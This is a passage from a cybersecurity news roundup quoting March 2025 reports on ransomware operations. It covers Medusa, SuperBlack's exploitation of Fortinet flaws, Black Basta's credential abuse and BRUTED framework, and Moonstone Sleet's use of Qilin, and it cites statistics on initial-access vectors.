    • “The Medusa ransomware gang has infected more than 300 organizations in critical infrastructure sectors such as the medical, manufacturing and technology industries.
    • That’s according to a joint cybersecurity advisory published Wednesday by CISA, the FBI and the Multi-State Information Sharing and Analysis Center (MS-ISAC). The agencies noted that Medusa — which is not connected to MedusaLocker ransomware — has been active since 2021 and initially began as a closed ransomware operation.
    • “While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers,” the [March 12, 2025,] advisory said. “Both Medusa developers and affiliates — referred to as ‘Medusa actors’ in this advisory — employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.”
  • and
    • “A newly discovered ransomware strain, tracked as SuperBlack, has been used in a series of attacks targeting critical vulnerabilities in Fortinet since late January, according to a report by Forescout Research-Vedere Labs.
    • “The attacks involved exploitation of two vulnerabilities, CVE-2024-55591 and CVE-2025-24472, which can allow unauthenticated attackers to gain super admin privileges on FortiOS firewalls. 
    • “Researchers link the attacks to a threat actor — tracked as Mora_001 — that has operational overlaps with LockBit ransomware operations.
  • and
    • “About six of every 10 ransomware claims in 2024 involved the compromise of a perimeter security device such as a virtual private network or firewall, according to the Coalition Cyber Threat Index report released Tuesday [March 11, 2025]. In two of every 10 cases, remote desktop protocols were exploited for initial access. 
    • “Stolen credentials served as the initial access vectors in almost half of the cases, while software vulnerabilities were exploited in about three of every 10 cases. 
    • “Two thirds of businesses had at least one internet-exposed web login panel at the time they applied for cyber insurance policies, according to the report. The cyber insurance provider said it detected more than 5 million exposed remote management solutions and tens of thousands of exposed login panels.”
  • Dark Reading points out,
    • “A recent analysis of a year’s worth of chat logs from the infamous Black Basta ransomware group revealed that its members used nearly 3,000 unique credentials to attempt to compromise a variety of corporate networks.
    • “The top five uses of the credentials? Targeting remote-desktop software and virtual private networks (VPNs), according to threat intelligence firm KELA, which published its analysis of the chat logs last week.
    • “From Microsoft’s Remote Desktop Web Access to Palo Alto’s Global Protect and from Cisco’s VPN services to general remote login portals, stealing credentials to target remote access is perhaps the most popular technique used by ransomware groups. Once compromised, such services can be used as gateways to the corporate networks and quickly lead to data exfiltration and eventual ransomware deployment, says Irina Nesterovsky, chief research officer for KELA.
    • “Obtaining such credentials and successfully accessing those platforms — either due to lack of MFA or bypassing it — allows the actors a foothold into an organization’s network, which they can then further expand using different tools and reconnaissance,” she says. “KELA observed the Black Basta ransomware actors discussing the sourcing of specifically login credentials to VPN and remote access portals in the context of a ransomware operation — it is very clear what such credentials are abused for.”
  • Bleeping Computer adds,
    • “The Black Basta ransomware operation created an automated brute-forcing framework dubbed ‘BRUTED’ to breach edge networking devices like firewalls and VPNs.
    • “The framework has enabled BlackBasta to streamline initial network access and scale ransomware attacks on vulnerable internet-exposed endpoints.
    • “The discovery of BRUTED comes from EclecticIQ researcher Arda Büyükkaya following an in-depth examination of the ransomware gang’s leaked internal chat logs.”
  • Per Security Affairs,
    • “Microsoft observed a North Korea-linked APT group, tracked as Moonstone Sleet, deploying Qilin ransomware in limited attacks since February 2025. The APT group uses Qilin ransomware after previously using custom ransomware.
    • “Moonstone Sleet has previously exclusively deployed their own custom ransomware in their attacks, and this represents the first instance they are deploying ransomware developed by a RaaS operator.” Microsoft wrote on X.
    • “In May 2024, Microsoft observed the North Korea-linked group “Moonstone Sleet” (previously tracked as Storm-1789) using known and novel techniques like fake companies, trojanized tools, a malicious game, and custom ransomware for financial gain and espionage.
    • Storm-1789, initially linked to other North Korean threat groups, has since adopted unique tactics, tools, and attack infrastructure.
    • “Moonstone Sleet threat actors target financial and cyberespionage victims using trojanized software, custom malware, malicious games, and fake companies like StarGlow Ventures and C.C. Waterfall to engage victims on LinkedIn, freelancing sites, Telegram, and email.”

From the cybersecurity defenses front,

  • Dark Reading explains why “Healthcare organizations must enhance their cybersecurity arsenal. Doing so can help them prevent financial, compliance, and reputational damage.”
  • Here’s a link to Dark Reading’s CISO Corner.